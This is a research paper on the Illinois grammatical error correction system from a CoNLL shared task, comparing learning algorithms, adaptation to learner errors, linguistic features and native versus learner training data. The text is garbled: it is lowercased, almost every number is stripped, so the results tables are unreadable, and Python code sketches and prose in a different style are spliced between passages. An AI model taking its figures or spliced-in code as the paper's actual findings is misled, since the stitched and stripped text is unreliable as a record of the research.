since tense errors are not part of the task. to generate morphological variants, the system makes use of a morphological analyzer verbmorph; it assumes ( ) a list of valid verb lemmas (compiled using a pos- dimension systems used in the comparison learn. alg. (sec. . ) nthu, umc adaptation (sec. . ) error inflation: hit ling. knowledge cand. identification: nthu, hit (sec. . ) verb finiteness: nthu train. data (sec. . ) hit, nara table : system comparisons. column indicates the di- mension, and column lists systems whose approaches provide a relevant point of comparison. tagged version of the nyt section of the gigaword corpus) and ( ) a list of irregular english verbs. candidate identification stage selects the set of words that are presented as input to the classifier. this is a crucial step: errors missed at this stage will not be detected by the later stages. see sec. . . verb finiteness is used in the illinois system to sep- arately process verbs that fulfill different grammati- cal functions and thus are marked for different gram- matical properties. see sec. . . correction modules the agreement module is a bi- nary classifier. the form module is a -class system. both classifiers are trained on the web t corpus. . noun errors noun number errors involve confusing singular and plural noun forms (e.g. “phone” instead of “phones” in fig. ) and are the second most common error type in the nucle corpus after determiner mistakes (table ). the illinois noun module is trained on the web t corpus using nb. similar to verbs, candi- date identification is an important step in the noun classifier. see sec. . . system analysis in this section, we evaluate the illinois system along the four dimensions identified in sec. , compare its components to alternative configurations imple- mented by other teams, and present additional exper- iments that further analyze each dimension. 
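The preposition features described earlier in this section are word n-grams of various lengths that span the target word, drawn from a window of four words on each side. A minimal sketch of that feature extraction (an illustration, not the exact Illinois feature set):

```python
# A minimal sketch of the word n-gram features described above: all n-grams of
# various lengths that span the target preposition, drawn from a window of four
# words on each side of it.

def ngram_features(tokens, target_index, window=4, max_n=4):
    """Return (feature-name, n-gram) pairs spanning tokens[target_index]."""
    lo = max(0, target_index - window)
    hi = min(len(tokens), target_index + window + 1)
    features = []
    for n in range(2, max_n + 1):                      # n-gram length
        for start in range(lo, hi - n + 1):
            end = start + n
            if start <= target_index < end:            # must span the target
                offset = start - target_index          # position relative to target
                features.append(("%d:%d" % (n, offset), " ".join(tokens[start:end])))
    return features

sent = "problem as the search of alternative resources to the".split()
for name, gram in ngram_features(sent, sent.index("of")):
    print(name, "->", gram)
# e.g. ('3:-2', 'the search of') corresponds to the 3-gram feature cited in the text.
```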
while a direct comparison with other systems is not always possible due to other differences between the sys- tems, we believe that these results are still useful. table lists systems used for comparion. it is im- portant to note that the dimensions are not indepen- dent. for instance, there is a correlation between algorithm choice and training data. the tool and more detail about it can be found at http://cogcomp.cs.illinois.edu/page/publication view/ results are reported on the test data using f com- puted with the conll scorer (dahlmeier and ng, ). error-specific results are generated based on the output of individual modules. note that these are not directly comparable to error-specific results in the conll overview paper: the latter are approx- imate as the organizers did not have the error type information for corrections in the output. the com- plete system includes the union of corrections made by each of these modules, where the corrections are applied in order. ordering overlapping candidates might potentially affect the final output, when mod- ules correctly identify an error but propose differ- ent corrections, but this does not happen in practice. modules that are part of the illinois submission are marked with an asterisk in all tables. to demonstrate that our findings are not spe- cific to conll, we also show results on the fce dataset. it is produced by learners from seventeen first language backgrounds and contains , words from the cambridge learner corpus (clc) (yannakoudakis et al., ). we split the corpus into two equal parts – training and test. the statis- tics are shown in appendix tables a. and a. . . dim. : learning algorithm rozovskaya and roth ( , sec. ) discuss the re- lations between the amount of training data, learn- ing algorithms, and the resulting performance. they show that on training sets of similar sizes, discrimi- native classifiers outperform other machine learning methods on this task. following these results, the illinois article module that is trained on the nucle corpus uses the discriminative approach ap. most of the other teams that train on the nucle corpus also use a discriminative method. however, when a very large native training set such as the web t corpus is available, it is often ad- vantageous to use it. the web t corpus is a collec- tion of n-gram counts of length one to five over a cor- pus of words. since the corpus does not come with complete sentences, it is not straightforward to make use of a discriminative classifier because of the limited window provided around each example: training a discriminative model would limit the sur- overlapping candidates are included in more than one module: if “work” is tagged as nn, it is included in the noun module, but also in the form module (as a valid verb lemma). rounding context features to a -word window. be- cause we wish to make use of the context features that extend beyond the -word window, it is only possible to use count-based methods, such as nb or lm. several teams make use of the web t corpus: umc uses a count-based lm for article, preposition, and noun number errors; nthu addresses all errors with a count-based model with backoff, which is es- sentially a variation of a language model with back- off. the illinois system employs the web t corpus for all errors, except articles, using nb. 
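The results in this section are F-scores produced by the shared-task scorer. As a reminder of what is being computed, the sketch below gives a simplified precision/recall/F1 calculation over sets of edits; the actual (M2-style) scorer additionally aligns phrase-level edits against the text and can accept alternative gold answers, both of which this sketch ignores.

```python
# Simplified precision/recall/F1 over edit sets. The real shared-task scorer also
# performs edit alignment and supports alternative gold annotations; here each
# correction is simply a (position, replacement) pair.

def prf(system_edits, gold_edits):
    system_edits, gold_edits = set(system_edits), set(gold_edits)
    tp = len(system_edits & gold_edits)
    # Conventions for the empty-set cases vary; 1.0 is used here.
    precision = tp / len(system_edits) if system_edits else 1.0
    recall = tp / len(gold_edits) if gold_edits else 1.0
    f1 = (2 * precision * recall / (precision + recall)) if (precision + recall) else 0.0
    return precision, recall, f1

gold = [(3, "the"), (10, "phones"), (17, "contribute")]
system = [(3, "the"), (10, "phones"), (21, "in")]
print(prf(system, gold))  # (0.666..., 0.666..., 0.666...)
```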
training naı̈ve bayes for deletions and inser- tions the reason for not using the web t corpus for article errors is that training nb on web t for deletions and insertions presents a problem, and the majority of article errors are of this type. recall that web t contains only n-gram counts, which makes it difficult to estimate the prior count for the ∅ candi- date. (with access to complete sentences, the prior of ∅ is estimated by counting the total number of ∅ candidates; e.g., in case of articles, the number of nps with ∅ article is computed.) we solve this prob- lem by treating the article and the word following it as one target. for instance, to estimate prior counts for the article candidates in front of the word “cam- era” in “including camera”, we obtain counts for “camera”, “a camera”, “the camera”. in the case of the ∅ candidate, the word “camera” acts as the tar- get. thus, the confusion set for the article classifier is modified as follows: instead of the three articles (as shown in sec. . ), each member of the confu- sion set is a concatenation of the article and the word that follows it, e.g. {a camera, the camera, cam- era}. the counts for contextual features are obtained similarly, e.g. a feature that includes a preceding word would correspond to the count of “including x”, where x can take any value from the confusion set. the above solution allows us to train nb for ar- ticle errors and to extend the preposition classifier to handle extraneous preposition errors (table ). rozovskaya and roth ( ) study several algo- rithms trained on the web t corpus and observe that, when evaluated with the same context win- dow size, nb performs better than other count-based methods. in order to show the impact of the algo- rithm choice, in table , we compare lm and nb models. both models use word n-grams spanning the target word in the -word window. we train lms error model f conll fce art. lm . . nb . . prep. lm . . nb . . noun lm . . nb* . . agr. lm . . nb* . . form lm . . nb* . . table : comparison of learning models. web t corpus. modules that are part of the illinois submission are marked with an asterisk. source candidates ed inf ing s ed . . . . inf . . . . ing . . . . s . . . . table : priors confusion matrix used for adapting nb. each entry shows prob(candidate|source), where source corre- sponds to the verb form chosen by the author. with srilm (stolcke, ) using jelinek-mercer linear interpolation as a smoothing method (chen and goodman, ). on the conll test data, nb outperforms lm on all errors; on the fce corpus, nb is superior on all errors, except preposition er- rors, where lm outperforms nb only very slightly. we attribute this to the fact that the preposition prob- lem has more labels; when there is a big confusion set, more features have default smooth weights, so there is no advantage to running nb. we found that with fewer classes ( rather than prepositions), nb outperforms lm. it is also possible that when we have a lot of labels, the theoretical difference be- tween the algorithms disappears. note that nb can be improved via adaptation (next section) and then it outperforms the lm also for preposition errors. . dim. : adaptation to learner errors in the previous section, the models were trained on native data. these models have no notion of the er- ror patterns of the learners. here we discuss model adaptation to learner errors, i.e. developing models that utilize the knowledge about the types of mis- takes learners make. 
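A sketch of the counting trick just described, assuming a hypothetical `ngram_count` lookup over Web1T-style n-gram counts: the article and the word that follows it are treated as a single target, so that counts (and hence priors and contextual features) can also be obtained for the empty-article candidate.

```python
# Sketch of the counting trick for the omitted-article candidate. `ngram_count` is a
# hypothetical lookup into a table of n-gram counts; the article and the following
# word are treated as one target so that a prior can be estimated for the empty
# article as well.

def article_prior_counts(next_word, ngram_count):
    """Unnormalized prior counts for the candidates {a X, the X, X}."""
    return {
        "a":   ngram_count("a " + next_word),
        "the": ngram_count("the " + next_word),
        "":    ngram_count(next_word),   # empty article: the word itself is the target
    }

def contextual_feature_count(prev_word, candidate, next_word, ngram_count):
    """Count for a feature that includes the preceding word, e.g. 'including X'."""
    target = (candidate + " " + next_word).strip()
    return ngram_count(prev_word + " " + target)

# Example for the phrase "including camera" from the text (counts are invented):
fake_counts = {"camera": 900, "a camera": 520, "the camera": 310,
               "including camera": 12, "including a camera": 40, "including the camera": 25}
lookup = lambda g: fake_counts.get(g, 0)
print(article_prior_counts("camera", lookup))
print(contextual_feature_count("including", "a", "camera", lookup))  # 40
```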
adaptation is based on the fact that learners make mistakes in a systematic manner, e.g. errors are influenced by the writer’s first lan- guage (gass and selinker, ; ionin et al., ). there are different ways to adapt a model that de- pend on the type of training data (learner or native) and the algorithm choice. the key application of adaptation is for models trained on native english data, because the learned models do not know any- thing about the errors learners make. with adapta- tion, models trained on native data can use the au- thor’s word (the source word) as a feature and thus propose a correction based on what the author orig- inally wrote. this is crucial, as the source word is an important piece of information (rozovskaya and roth, b). below, several adaptation techniques are summarized and evaluated. the illinois system makes use of adaptation in the article model via the inflation method and adapts its nb preposition clas- sifier trained on web t with the priors method. adapting nb the priors method (rozovskaya and roth, , sec. ) is an adaptation technique for a nb model trained on native english data; it is based on changing the distribution of priors over the cor- rection candidates. candidate prior is a special pa- rameter in nb; when nb is trained on native data, candidate priors correspond to the relative frequen- cies of the candidates in the native corpus and do not provide any information on the real distribution of mistakes and the dependence of the correction on the word used by the author. in the priors method, candidate priors are changed using an error confusion matrix based on learner data that specifies how likely each confusion pair is. table shows the confusion matrix for verb form errors, computed on the nucle data. adapted pri- ors are dependent on the author’s original verb form used: let s be a form of the verb appearing in the source text, and c a correction candidate. then the adapted prior of c given s is: prior(c|s) = c(s, c) c(s) where c(s) denotes the number of times s appeared in the learner data, and c(s, c) denotes the number of times c was the correct form when s was used by a writer. the adapted priors differ by the source: the probability of candidate inf when the source form is s, is more than twice than when the source form is error model f conll fce train test art. nb . . . nb-adapted . . . prep. nb . . . nb-adapted* . . . noun nb* . . . nb-adapted . . . agr. nb* . . . nb-adapted . . . form nb* . . . nb-adapted . . . table : adapting nb with the priors method. all models are trained on the web t corpus. modules that are part of the illinois submission are marked with an asterisk. ed; the probability that s is the correct form is very high, which reflects the low error rates. table compares nb and nb-adapted models. because of the dichotomy in the error rates in conll training and test data, we also show exper- iments using -fold cross-validation on the training data. adaptation always helps on the conll train- ing data and the fce data (except noun errors), but on the test data it only helps on article and verb form errors. this is due to discrepancies in the error rates, as adaptation exploits the property that learner errors are systematic. indeed, when priors are estimated on the test data (in -fold cross-validation), the perfor- mance improves, e.g. the preposition module attains an f of . instead of . . 
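The priors method above replaces the native-data candidate priors with prior(c|s) = C(s, c)/C(s), estimated from a confusion matrix of (source form, correct form) counts collected from annotated learner data. A minimal sketch with invented counts:

```python
# A minimal sketch of the priors adaptation described above: candidate priors of a
# Naive Bayes model trained on native data are replaced by prior(c|s) = C(s,c)/C(s),
# estimated from learner data. The counts below are invented for illustration.
from collections import defaultdict

def adapted_priors(confusions):
    """confusions: dict mapping (source, correction) -> count from learner data."""
    totals = defaultdict(int)
    for (source, _), count in confusions.items():
        totals[source] += count
    priors = defaultdict(dict)
    for (source, correction), count in confusions.items():
        priors[source][correction] = count / totals[source]
    return priors

# Toy verb-form confusion counts (the source form is kept correct most of the time,
# reflecting the low error rates discussed in the text).
confusions = {
    ("s", "s"): 950, ("s", "inf"): 40, ("s", "ing"): 6, ("s", "ed"): 4,
    ("inf", "inf"): 900, ("inf", "s"): 80, ("inf", "ing"): 12, ("inf", "ed"): 8,
}
priors = adapted_priors(confusions)
print(priors["s"])    # prior over candidates when the writer wrote the -s form
print(priors["inf"])  # prior over candidates when the writer wrote the base form
```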
concerning lack of improvement on noun num- ber errors, we hypothesize that these errors differ from the other mistakes in that the appropriate form strongly depends on the surface form of the noun, which would, in turn, suggest that the dependency of the label on the grammatical form of the source that the adaptation is trying to discover is weak. in- deed, the prior distribution of {singular, plural} la- bel space does not change much when the source feature is taken into account. the unadapted priors for “singular” and “plural” are . and . , respec- tively. similarly, the adapted priors (singular|plural) and (plural|singular) are . and . , respec- tively. in other words, the unadapted prior probabil- ity for “plural” is three times lower than for “singu- lar”, which does not change much with adaptation. this is different for other errors. for instance, in case of verb agreement, the unadapted prior for “plu- ral” is . , more than three times than the “sin- gular” prior of . . with adaptation, these priors become almost the same ( . and . ). adapting ap the ap is a discriminative learning algorithm and does not use priors on the set of can- didates. in order to reflect our estimate of the error distribution, the ap algorithm is adapted differently, by introducing into the native data artificial errors, in a rate that reflects the errors made by the esl writers (rozovskaya and roth, b). the idea is to simulate learner errors in training, through arti- ficial mistakes (also produced using an error confu- sion matrix). the original method was proposed for models trained on native data. this technique can be further enhanced using the error inflation method (rozovskaya et al., , sec. ) applied to models trained on native or learner data. the illinois system uses error inflation in its ar- ticle classifier. because this classifier is trained on learner data, the source article can be used as a fea- ture. however, since learner errors are sparse, the source feature encourages the model to abstain from flagging a mistake, which results in low recall. the error inflation technique addresses this problem by boosting the proportion of errors in the training data. it does this by generating additional artificial errors using the error distribution from the training set. table shows the results of adapting the ap clas- sifier using error inflation. (we omit noun results, since the noun ap model performs better without the source feature, which is similar to the noun nb model, as discussed above.) the inflation method improves recall and, consequently, f . it should be noted that although inflation also decreases preci- sion it is still helpful. in fact, because of the low error rates, performance on the conll dataset with natural errors is very poor, often resulting in f be- ing equal to due to no errors being detected. inflation vs. sampling to demonstrate the impact of error inflation, we compare it against sampling, an approach used by other teams – e.g. hit – that improves recall by removing correct examples in training. the hit article model is similar to the the idea of using artificial errors goes back to izumi et al. ( ) and was also used in foster and andersen ( ). the approach discussed here refers to the adaptation method in ro- zovskaya and roth ( b) that generates artificial errors using the distribution of naturally-occurring errors. error model f conll fce art. ap (natural errors) . . ap (infl. const. . )* . . prep. ap (natural errors) . . ap (infl. const. . ) . . agr. 
ap (natural errors) . . ap (infl. const. . ) . . form ap (natural errors) . . ap (infl. const. . ) . . table : adapting ap using error inflation. models are trained on learner data with word n-gram features and the source feature. inflation constant shows how many correct instances remain (e.g. . indicates that % of correct examples are un- changed, while % are converted to mistakes.) modules that are part of the illinois submission are marked with an asterisk. infl. constant f sampling inflation . . . . . . . . . . . . . . . table : comparison of the inflation and sampling meth- ods on article errors (conll). the proportion of errors in training in each row is identical. illinois model but scored three points below. ta- ble shows that sampling falls behind the inflation method, since it considerably reduces the training size to achieve similar error rates. the proportion of errors in training in each row is identical: sampling achieves the error rates by removing correct exam- ples, whereas the inflation method converts some positive examples to artificial mistakes. inflation constant shows how many correct instances remain; smaller inflation values correspond to more erro- neous instances in training; the sampling approach, correspondingly, removes more positive examples. to summarize, we have demonstrated the impact of error inflation by comparing it to a similar method used by another team; we have also shown that fur- ther improvements can be obtained by adapting nb to learner errors using the priors method, when train- ing and test data exhibit similar error patterns. . dim. : linguistic knowledge the use of linguistic knowledge is important in sev- eral components of the error correction system: fea- ture engineering, candidate identification, and spe- error features f conll fce art. n-gram . . n-gram+pos+chunk* . . agr. n-gram . . n-gram+pos . . n-gram+pos+syntax . . table : feature evaluation. models are trained on learner data, use the source word and error inflation. modules that are part of the illinois submission are marked with an asterisk. cial techniques for correcting verb errors. features it is known from many nlp tasks that feature engineering is important, and this is the case here. note that this is relevant only when training on learner data, as models trained on web t can make use of n-gram features only but for the nucle cor- pus we have several layers of linguistic annotation. we found that for article and agreement errors, using deeper linguistic knowledge is especially beneficial. the article features in the illinois module, in addi- tion to the surface form of the context, encode pos and shallow parse properties. these features are pre- sented in rozovskaya et al. ( , table ) and ap- pendix table a. . the illinois agreement module is trained on web t but further analysis reveals that it is better to train on learner data with rich features. the word n-gram and pos agreement features are the same as those in the article module. syntactic features encode properties of the subject of the verb and are presented in rozovskaya et al. ( b, table ) and appendix table a. ; these are based on the syntactic parser (klein and manning, ) and the dependency converter (marneffe et al., ). table shows that adding rich features is help- ful. notably, adding deeper syntactic knowledge to the agreement module is useful, although parse features are likely to contain more noise. 
foster ( ) and lee and seneff ( ) observe a degrade in performance on syntactic parsers due to grammat- ical noise that also includes agreement errors. for articles, we chose to add syntactic knowledge from shallow parse as it is likely to be sufficient for arti- cles and more accurate than full-parse features. candidate identification for errors on open-class feature engineering will also be relevant when training on a native corpus that has linguistic annotation. parse features have also been found useful in preposition error correction (tetreault et al., ). words is rarely discussed but is a crucial step: it is not possible to identify the relevant candidates us- ing a closed list of words, and the procedure needs to rely on pre-processing tools, whose performance on learner data is suboptimal. rozovskaya et al. ( b, sec. . ) describe and evaluate several can- didate selection methods for verbs. the illinois sys- tem implements their best method that addresses pre-processing errors, by selecting words tagged as verbs as well as words tagged as nn, whose lemma is on the list of valid verb lemmas (sec. . ). following descriptions provided by several teams, we evaluate several candidate selection methods for nouns. the first method includes words tagged as nn or nns that head an np. nthu and hit use this method; nthu obtained the second best noun score, after the illinois system; its model is also trained on web t. the second method includes all words tagged as nn and nns and is used in several other systems, e.g. szeg, (berend et al., ). the above procedures suffer from pre-processing errors. the illinois method addresses this problem by adding words that end in common noun suffixes, e.g. “ment”, “ments”, and “ist”. the percentage of noun errors selected as candidates by each method and the impact of each method on the performance are shown in table . the illinois method has the best result on both datasets; on conll, it improves f score by points and recovers % of the candi- dates that are missed by the first approach. on fce, the second method is able to recover more erroneous candidates, but it does not perform as well as the last method, possibly, due to the number of noisy candidates it generates. to conclude, pre-processing mistakes should be taken into consideration, when correcting errors, especially on open-class words. using verb finiteness to correct verb errors as shown in table , the surface realizations that cor- respond to the agreement candidates are a subset of the possible surface realizations of the form classi- fier. one natural approach, thus, is to train one clas- sifier to predict the correct surface form of the verb. however, the same surface realization may corre- spond to multiple grammatical properties. this ob- candidate selection is also difficult for closed-class errors in the case of omissions, e.g. articles, but article errors have been studied rather extensively, e.g. (han et al., ), and we have no room to elaborate on it here. candidate error recall (%) f ident. method conll fce conll fce np heads . . . . all nouns . . . . nouns+heuristics* . . . . table : nouns: effect of candidate identification methods on the correction performance. models are trained using nb. error recall denotes the percentage of nouns containing number errors that are selected as candidates. modules that are part of the illinois submission are marked with an asterisk. training method f conll fce one classifier . . finiteness-based training (i) . . finiteness-based training (ii) . . 
table : improvement due to separate training for verb errors. models are trained using the ap algorithm. servation motivates the approach that corrects agree- ment and form errors separately (rozovskaya et al., b). it uses the linguistic notion of verb finite- ness (radford, ) that distinguishes between fi- nite and non-finite verbs, each of which fulfill differ- ent grammatical functions and thus are marked for different grammatical properties. verb finiteness is used to direct each verb to the appropriate classifier. the candidates for the agree- ment module are verbs that take agreement markers: the finite surface forms of the be-verbs (“is”, “are”, “was”, and “were”), auxiliaries “have” and “has”, and finite verbs tagged as vb and vbz that have ex- plicit subjects (identified with the parser). the form candidates are non-finite verbs and some of the verbs whose finiteness is ambiguous. table compares the two approaches: when all verbs are handled together; and when verbs are pro- cessed separately. all of the classifiers use surface form and pos features of the words in the -word window around the verb. several subsets of these features were tried; the single classifier uses the best combination, which is the same word and pos fea- tures shown in appendix table a. . finiteness- based classifier (i) uses the same features for agree- ment and form as the single classifier. when training separately, we can also explore whether different errors benefit from different fea- tures; finiteness-based classifier (ii) optimizes fea- tures for each classifier. the differences in the fea- ture sets are minor and consist of removing several unigram word and pos features of tokens that do not appear immediately next to the verb. recall from the discussion on features that the agreement module can be further improved by adding syntactic knowl- edge. in the next section, it is shown that an even better approach is to train on learner data for agree- ment mistakes and on native data for form errors. the results in table are for ap models but sim- ilar improvements due to separate training are ob- served for nb models trained on web t. note that the nthu system also corrects all verb errors us- ing a model trained on web t but handles all these errors together; its verb module scored f points below the illinois one. while there are other differ- ences between the two systems, the results suggest that part of the improvement within the illinois sys- tem is indeed due to handling the two errors sepa- rately. . dim. : training data nucle is a large corpus produced by learners of the same language background as the test data. because of its large size, training on this corpus is a natural choice. indeed, many teams follow this approach. on the other hand, an important issue in the conll task is the difference between the training and test sets, which has impact on the selection of the train- ing set – the large web t has more coverage and allows for better generalization. we show that for some errors it is especially advantageous to train on a larger corpus of native data. it should be noted that while we refer to the web t corpus as “native”, it certainly contains data from language learners; we assume that the noise can be neglected. table compares models trained on native and learner data in their best configurations based on the training data. overall, we find that web t is clearly preferable for noun errors. 
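The candidate-identification and finiteness-routing steps discussed in the preceding subsections can be sketched as follows. The suffix list is partial, and the part-of-speech conventions (Penn-style tags, parser-based subject detection) are simplifying assumptions rather than the exact Illinois rules.

```python
# Sketch of the candidate-identification heuristics discussed above (simplified).
# Penn-style POS tags from an external tagger are assumed; a real system also uses
# a parser to detect explicit subjects when routing verbs, which is skipped here.

NOUN_SUFFIXES = ("ment", "ments", "ist", "ists")      # partial list, for illustration
FINITE_BE = {"is", "are", "was", "were"}

def noun_candidates(tagged):
    """Indices of nouns (NN/NNS) plus words with common noun suffixes, which helps
    recover candidates that the tagger mislabeled."""
    return [i for i, (word, pos) in enumerate(tagged)
            if pos in ("NN", "NNS") or word.lower().endswith(NOUN_SUFFIXES)]

def route_verb(word, pos, has_explicit_subject):
    """Send a verb candidate to the 'agreement' or 'form' module based on finiteness cues."""
    if word.lower() in FINITE_BE or word.lower() in ("have", "has"):
        return "agreement"
    if pos in ("VBP", "VBZ") and has_explicit_subject:   # finite present-tense verbs
        return "agreement"
    return "form"

tagged = [("environmental", "JJ"), ("factors", "NNS"), ("contributes", "VBZ"),
          ("difficulties", "NNS"), ("equipment", "NN")]
print(noun_candidates(tagged))                  # [1, 3, 4]
print(route_verb("contributes", "VBZ", True))   # agreement
```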
we attribute this to the observation that noun number usage strongly depends on the surface form of the noun, and not just the contextual cues and syntactic structure. for example, certain nouns in english tend to be used exclusively in singular or plural form. thus, con- siderably more data compared to other error types is required to learn model parameters. on article and preposition errors, native-trained models perform slightly better on conll, while learner-trained models are better on fce. we con- error train. learning features f data algorithm conll fce art. native nb-adapt. n-gram . . learner ap-infl.* +pos+chunk . . prep. native lm; nb-adapt. n-gram . . learner ap-infl. n-gram . . noun native nb* n-gram . . learner ap-infl. +pos . . agr. native nb-adapt. n-gram . . learner ap-infl. +pos+syntax . . form native nb-adapt. n-gram . . learner ap-infl. +pos . . table : choice of training data: learner vs. native (web t). for prepositions, lm is chosen for conll, and nb- adapted for fce. modules that are part of the illinois submis- sion are marked with an asterisk. jecture that the fce training set is more similar to the respective test data and thus provides an advan- tage over training on native data. on verb agreement errors, native-trained models perform better than those trained on learner data, when the same n-gram features are used. however, when we add pos and syntactic knowledge, train- ing on learner data is advantageous. finally, for verb form errors, there is an advantage when training on a lot of native data, although the difference is not as substantial as for noun errors. this suggests that unlike agreement mistakes that are better addressed using syntax, form errors, similarly to nouns, benefit from training on a lot of data with n-gram features. to summarize, choice of the training data is an important consideration for building a robust sys- tem. researchers compared native- and learner- trained models for prepositions (han et al., ; cahill et al., ), while the analysis in this work addresses five error types – showing that errors be- have differently – and evaluates on two corpora. discussion in table , we show the results of the system, where the best modules are selected based on the performance on the training data. we also show the illinois modules (without post-processing). the fol- lowing changes are made with respect to the illinois submission: the preposition system is based on an lm and enhanced to handle spurious preposition er- rors (thus the illinois result of . shown here is for studies that directly combine native and learner data in training, see gamon ( ) and dahlmeier and ng ( ). error illinois submission this work model f model f art. ap-infl. . ap-infl. . prep. nb-adapt. . lm . noun nb . nb . agr. nb . ap-infl. . form nb . nb-adapt. . all . . table : results on conll of the illinois system (with- out post-processing) and this work. nb and lm models are trained on web t; ap models are trained on nucle. modules different from the illinois submission are in bold. different from the . in table ); the agreement classifier is trained on the learner data using ap with rich features and error inflation; the form classifier is adapted to learner mistakes, whereas the illinois submission trains nb without adaptation. the key improvements are observed with respect to least fre- quent errors, so the overall improvement is small. importantly, the illinois system already takes into account the four dimensions analyzed in this paper. 
in conll- , systems were compared using f . practical systems, however, should be tuned for good precision to guarantee that the overall qual- ity of the text does not go down. clearly, optimiz- ing for f does not ensure that the system improves the quality of the text (see appendix b). a differ- ent evaluation metric based on the accuracy of the data is proposed in rozovskaya and roth ( b). for further discussion of evaluation metrics, see also wagner ( ) and chodorow et al. ( ). it is also worth noting that the obtained results underestimate the performance because the agree- ment on what constitutes a mistake can be quite low (madnani et al., ), so providing alternative cor- rections is important. the revised annotations ad- dress this problem. the illinois system improves its f from . to . on revised annotations. however, these numbers are still an underestimation because the analysis typically eliminates precision errors but not recall errors. this is not specific to conll: an error analysis of the false positives in clc that includes the fce showed an increase in precision from % to % and % to % for preposition and article errors (gamon, ). an error analysis of the training data also al- lows us to determine prominent groups of system errors and identify areas for potential improvement, which we outline below. cascading nlp errors: in the example below, the illinois system incorrectly changes “need” to “needs” as it considers “victim” to be the subject of that verb: “also, not only the kid- nappers and the victim needs to be tracked down, but also jailbreakers.” errors in interacting linguis- tic structures: the illinois system considers every word independently and thus cannot handle interact- ing phenomena. in the example below, the article and the noun number classifiers propose corrections that result in an ungrammatical structure “such a sit- uations”: “in such situation, individuals will lose their basic privacy.” this problem is addressed via global models (rozovskaya and roth, ) and re- sults in an improvement over the illinois system. er- rors due to limited context: the illinois system does not consider context beyond sentence level. in the example below, the system incorrectly proposes to delete “the” but the wider context indicates that the definite article is more appropriate here: “we have to admit that how to prevent the abuse and how to use it reasonably depend on a sound legal system, and it means surveillance has its own restriction.” conclusion we identified key design principles in developing a state-of-the-art error correction system. we did this through analysis of the top system in the conll- shared task along several dimensions. the key dimensions that we identified and analyzed con- cern the choice of a learning algorithm, adaptation to learner mistakes, linguistic knowledge, and the choice of the training data. we showed that the de- cisions in each case depend both on the type of a mistake and the specific setting, e.g. how much an- notated learner data is available. furthermore, we provided points of comparison with other systems along these four dimensions. acknowledgments we thank peter chew and the anonymous reviewers for the feedback. most of this work was done while the first author was at the university of illinois. this material is based on re- search sponsored by darpa under agreement number fa - - - and by the army research laboratory (arl) under agreement w nf- - - . 
any opinions, findings, con- clusions or recommendations are those of the authors and do not necessarily reflect the view of the agencies. references g. berend, v. vincze, s. zarrieß, and r. farkas. . lfg-based features for noun number and article gram- matical errors. in proceedings of conll: shared task. t. brants and a. franz. . web t -gram version . linguistic data consortium. a. cahill, n. madnani, j. tetreault, and d. napolitano. . robust systems for preposition error correction using wikipedia revisions. in proceedings of naacl. s. chen and j. goodman. . an empirical study of smoothing techniques for language modeling. in pro- ceedings of acl. m. chodorow, m. dickinson, r. israel, and j. tetreault. . problems in evaluating grammatical error de- tection systems. in proceedings of coling. d. dahlmeier and h. t. ng. . grammatical error correction with alternating structure optimization. in proceedings of acl. d. dahlmeier and h.t ng. . a beam-search decoder for grammatical error correction. in proceedings of emnlp-conll. d. dahlmeier, h.t. ng, and s.m. wu. . build- ing a large annotated corpus of learner english: the nus corpus of learner english. in proceedings of the naacl workshop on innovative use of nlp for build- ing educational applications. r. dale and a. kilgarriff. . helping our own: the hoo pilot shared task. in proceedings of the th european workshop on natural language gen- eration. r. dale, i. anisimoff, and g. narroway. . a re- port on the preposition and determiner error correction shared task. in proceedings of the naacl workshop on innovative use of nlp for building educational applications. y. even-zohar and d. roth. . a sequential model for multi class classification. in proceedings of emnlp. j. foster and Ø. andersen. . generrate: generating errors for use in grammatical error detection. in pro- ceedings of the naacl workshop on innovative use of nlp for building educational applications. j. foster. . treebanks gone bad: generating a tree- bank of ungrammatical english. in proceedings of the ijcai workshop on analytics for noisy unstructures data. y. freund and r. e. schapire. . experiments with a new boosting algorithm. in proceedings of the th international conference on machine learning. m. gamon. . using mostly native data to correct errors in learners’ writing. in proceedings of naacl. s. gass and l. selinker. . language transfer in language learning. john benjamins. n. han, m. chodorow, and c. leacock. . detecting errors in english article usage by non-native speakers. journal of natural language engineering, ( ): – . n. han, j. tetreault, s. lee, and j. ha. . us- ing an error-annotated learner corpus to develop and esl/efl error correction system. in proceedings of lrec. t. ionin, m.l. zubizarreta, and s. bautista. . sources of linguistic knowledge in the second lan- guage acquisition of english articles. lingua, : – . e. izumi, k. uchimoto, t. saiga, t. supnithi, and h. isa- hara. . automatic error detection in the japanese learners’ english spoken data. in proceedings of acl. t.-h. kao, y.-w. chang, h.-w. chiu, t-.h. yen, j. bois- son, j.-c. wu, and j.s. chang. . conll- shared task: grammatical error correction nthu sys- tem description. in proceedings of conll: shared task. d. klein and c. d. manning. . fast exact inference with a factored model for natural language parsing. in proceedings of nips. c. leacock, m. chodorow, m. gamon, and j. tetreault. . automated grammatical error detection for language learners. morgan and claypool publish- ers. j. 
lee and s. seneff. . correcting misuse of verb forms. in proceedings of acl. n. madnani, m. chodorow, j. tetreault, and a. ro- zovskaya. . they can help: using crowdsourcing to improve the evaluation of grammatical error detec- tion systems. in proceedings of acl. m. marneffe, b. maccartney, and ch. manning. . generating typed dependency parses from phrase structure parses. in proceedings of lrec. h. t. ng, s. m. wu, y. wu, ch. hadiwinoto, and j. tetreault. . the conll- shared task on grammatical error correction. in proceedings of conll: shared task. h. t. ng, s. m. wu, t. briscoe, c. hadiwinoto, r. h. su- santo, and c. bryant. . the conll- shared task on grammatical error correction. in proceedings of conll: shared task. v. punyakanok and d. roth. . the use of classifiers in sequential inference. in proceedings of nips. a. radford. . transformational grammar. cam- bridge university press. n. rizzolo and d. roth. . learning based java for rapid development of nlp systems. in proceedings of lrec. a. rozovskaya and d. roth. a. annotating esl errors: challenges and rewards. in proceedings of the naacl workshop on innovative use of nlp for build- ing educational applications. a. rozovskaya and d. roth. b. training paradigms for correcting errors in grammar and usage. in pro- ceedings of naacl. a. rozovskaya and d. roth. . algorithm selec- tion and model adaptation for esl correction tasks. in proceedings of acl. a. rozovskaya and d. roth. . joint learning and in- ference for grammatical error correction. in proceed- ings of emnlp. a. rozovskaya, m. sammons, j. gioja, and d. roth. . university of illinois system in hoo text cor- rection shared task. in proceedings of the european workshop on natural language generation (enlg). a. rozovskaya, m. sammons, and d. roth. . the ui system in the hoo shared task on error cor- rection. in proceedings of the naacl workshop on innovative use of nlp for building educational ap- plications. a. rozovskaya, k.-w. chang, m. sammons, and d. roth. . the university of illinois system in the conll- shared task. in proceedings of conll shared task. a. rozovskaya, k.-w. chang, m. sammons, d. roth, and n. habash. a. the 